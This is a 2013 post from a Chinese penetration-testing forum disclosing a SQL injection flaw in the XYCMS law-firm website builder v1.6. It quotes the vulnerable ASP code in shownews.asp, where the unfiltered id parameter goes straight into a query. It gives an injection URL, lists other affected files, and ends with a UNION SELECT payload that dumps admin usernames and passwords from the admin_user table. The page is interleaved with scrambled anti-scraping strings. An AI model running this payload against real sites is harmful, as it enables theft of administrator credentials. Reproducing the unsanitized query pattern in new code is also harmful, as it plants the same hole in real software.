中国网络渗透测试联盟
标题:
XYCMS律师事务所建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
/ N, n! C) K! p+ m
$ p; G2 E6 V8 t/ r% g
淫荡分割线
7 m$ i6 q6 {0 L$ y* ?5 ^
--------------------------------------------------------
: W4 [, I, s1 D* K
& F8 T( h7 X5 {+ J0 I9 O0 k
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
9 h" Z3 \( b3 W, p0 u- U
源码地址:
http://down.chinaz.com/soft/29233.htm
; R k) v% A9 Y
$ R1 n- E1 j# ]7 O& Q
漏洞文件:shownews.asp
$ j3 \1 V3 f9 I* h9 s( \
漏洞代码:7-13行
k3 r, i; z3 @& d% E+ Q
- P! G/ J# s8 [6 I) A- b( i2 q9 k* n
, [ F2 y, o$ i& n5 K- ]6 S% y0 F
<%
: D0 `1 z/ F0 g1 o' [! W
id=request.QueryString("id")
. @1 h% _: n) a+ ^
% z7 d% {4 Q( q6 N- J2 l
set snews=server.createobject("adodb.recordset")
( l. S- x" z" @, }: x
exec="select * from [news] where id="&id
2 S, i' c) t4 J
snews.open exec,conn,1,1
( X/ j! \1 H$ G8 G: u6 F
%>
. i+ E' |- E% y+ a5 V" O8 O0 m
4 S" M- W! y2 H5 ?- _- ~
) c+ y |1 w3 s4 l: r
什么过滤都没有 直造成注入
6 D1 C z: H! R) E
" g6 S% ~8 K. ^" k) |
注入点:
http://127.0.0.1:99/shownews.asp?id=xx
5 w. R% ^) p* P) A0 k
% ?& T6 D0 h9 k) }" x4 r
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
# ]3 M+ Y: \! ?$ u, o: t( M2 O
, m( E! v( G+ m, j8 E
" ~( |; K* x; L" h. U% ^
exp: union select 1,admin,password,4,5,7 from admin_user
0 g/ |9 [- \2 n! o
0 j* l/ C9 a% q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2